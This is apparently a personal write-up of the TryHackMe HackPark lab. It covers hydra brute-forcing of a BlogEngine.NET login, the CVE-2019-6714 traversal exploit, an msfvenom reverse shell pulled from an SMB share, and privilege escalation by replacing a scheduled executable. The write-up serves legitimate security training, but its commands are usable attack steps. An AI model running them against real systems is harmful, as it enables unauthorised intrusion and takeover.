HackPark (THM)

TryHackMe – HackPark Write-Up

topics: web application security, brute forcing passwords, public exploits, Windows Privilege Escalation

Plan
Enumeration
Local Privilege Escalation (Exploitation)
Administrator Privilege Escalation

new tools:

tools: nmapAutomator, dirsearch, winPEAS, hydra

Plan

We are given a description of the room as it is a walkthrough, but for the sake of testing my current skill level I will not be looking at the walkthrough.

Enumeration

Initial nmap scan ./nmapAutomator.sh $ip Basic

We have http and ms-wbt-server (microsoft windows based terminal server) open on port 80 and 3389 (usually used for RDP).

Lets enumerate the webserver with dirsearch, python3 dirsearch.py -u $ip -e php,html,txt

There are many subdirectories on this machine, we know we have to bruteforce an account so lets attempt to look for login information. We have /Account which has a login.aspx page, this will most likely be the login we will have to brute force, but we need to find a username to login with.

The only username we can deduce from the home page is the adminadministrator author. There exists an admin account per the subdirectory, lets try this username first.

We will have to brute force with hydra. We know the username, we have a wordlist, we just need to know which http method we need. We can find this out by right clicking on the login field, inspecting the element and viewing the method is post

unzip rockyou.gz gunzip < /usr/share/wordlists/rockyou.txt.gz >> rockyou.txtand brute force the login.

At first, running hydra -l admin -P rockyou.txt <ipLoginPage> http-post-form will get an error message from hydra

It may seem as if there is a technical error with hydra, but because this is a post request we are not entering the correct information. We need not only the login page path, but also the request body and error message indicating a failed login.

To get the request body open the networks tab in the developer tools, send one login request with random credentials and inspect it by right clicking “Edit and Resend”

The message we get is "Login failed" this is the error message we need to use

If the command is run without the error message

Login page path: /Account/login.aspx?ReturnURL=/admin/
Request body: VIEWSTATE=u9T1yN9gmfSlqETGhZuWvBAkQa7NnNRoF2gMAQulNBgCwWRm4ogcqyuP2T3m6tuklHfqw8RkS7eWgFaAVsQCpKHkR%2FKQy3qL6%2B7u9tdUEhO%2Fu2VyhMeKNfj1FRzJSNRqMFMSfKIjEDd0LWx8savvmt5FxQiyjAsycdO2RWwz8ZesOMLb&EVENTVALIDATION=ewwkRTA5tfNxq149XUhMvjZv%2FoOT9f8f9sukUTpBVwxBoXMB%2FyXtl1JaARjodkeM%2BlUxncmKzjKkET4GcU%2FGL9JEfKy9qZ4JMNkUAYxrff7IorK4FCinvbR%2BcACl8pSwwK1%2FZqmS6zshuo9JSJ6in88CEs4qDvhPgoBy3ZNp%2Bg6YEOhh&ctl00%24MainContent%24LoginUser%24UserName=me&ctl00%24MainContent%24LoginUser%24Password=me&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in
Error message: Login failed

hydra -l admin -P rockyou.txt $ip http-post-form "login page path: request body: error message"

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.174.104 http-form-post "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=yP%2BzZRxWm7TkECRpYR3xwyRQYtrSszztGRNL4Uz9mctXTcwgfc1qtLY75IX1jHp0HBOCW28lEF5tb%2BktOBtj0SvgoywSBQKL7%2FKJZIHtxXUJVmQvNfEY%2Fq8bLMW7GBXwZ2zCppergFAlHYy8GsmMHW5lrR7w5QqkuUN6ltqTthT8QNUGGZSatX%2F%2FoJCgDZ86oPs93zkwRW0MPVsr7NXTrNZ2KfrEPkMX1%2BsztKZ3dsdI2NG0uLiRSaHKhzwJMrF5OvosCFxofyf61XMfVJkZdWOtsLvWCq9EAt7gS%2BIOXntnaLiot0g%2FYn8pbxC%2Bbq3WEvXX3chl2wGEG8ruqZyMgy8%2BejIN0YpW8OuwcW5tV%2FJmHLlT&__EVENTVALIDATION=k0kn6DqmKUOJ%2B6N01uhNQe5F%2BcmhCqbUvlNVFkf%2BJRFXXYWAkhK3vlUrmM2UP%2F5IMDuOe1xqGkRIqurysUyg8t0T2zCDeuwv%2FZPfVcCdBDiWBaG2TFXif8nB8Xp0iAgP56Rd%2FENNzNEj01U7YAYX2f7fvPpsICyxn1r1st8N9aFCrWcQ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

Local Privilege Escalation

We can attempt to run dirsearch on the /admin subdirectory to see if there are interesting files, but first lets inspect the About tab for the website

This appears to reveal all of the critical information we need to obtain a shell on this box. The website type is BlogEngine.NET, version 3.3.6.0 and other specifications. Lets search searchsploit for a vulnerabiliy.

searchsploit blogengine 3.3.6

Based on CVE-2019-6714, we will be exploiting a directory traversal attack. The instructions for the attack are below

Edit the ip address to the local Kali machine
Rename the file to PostView.ascx
Upload the file to the website via the first blog post
Listen on the given port with nc
Navigate to http://10.10.124.96/?theme=../../App_Data/files address and receive a shell

Lets create a stable shell with msfvenom and transfer it with smbserver.py

On kali:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.90.226 LPORT=1234 -f exe -o hi.exe
mkdir /usr/share/doc/python3-impacket/examples/HI
cp /root/hi.exe /usr/share/doc/python3-impacket/examples/HI
cd /usr/share/doc/python3-impacket/examples
python3 smbserver.py SMB .
nc -nlvp 1234

On victim:

cd C:\Windows\Temp
copy \\10.10.15.16\SMB\HI\hi.exe .
hi.exe

Administrator Privilege Escalation

Transfer winPEAS to the server with the same method and run winPEAS.exe

This hangs so we can assume it will not work on this system. Lets try the backup .\winPEAS.bat

This outputs a great deal of possibilities, however per Windows PrivEsc Arena, we know there are some common leverages that can be found in Windows boxes. Lets inspect the first few sections that show, installed software and program files.

There are multiple instances of Windows Scheduler running, lets check out what events are occuring under the log file C:\Program Files (x86)\SystemScheduler\Events

type 20198415519.INI_LOG.txt

There is a program Message.exe running every minute by the admin. Lets check our permissions with icacls

We can modify this file. Lets create a shell with msfvenom and rename it Message.exe. Download the file via smbserver to the \SystemScheduler path. Listen with nc and run Message.exe

PreviousBlueprint (THM)NextYear of the Owl (THM)

Last updated 3 years ago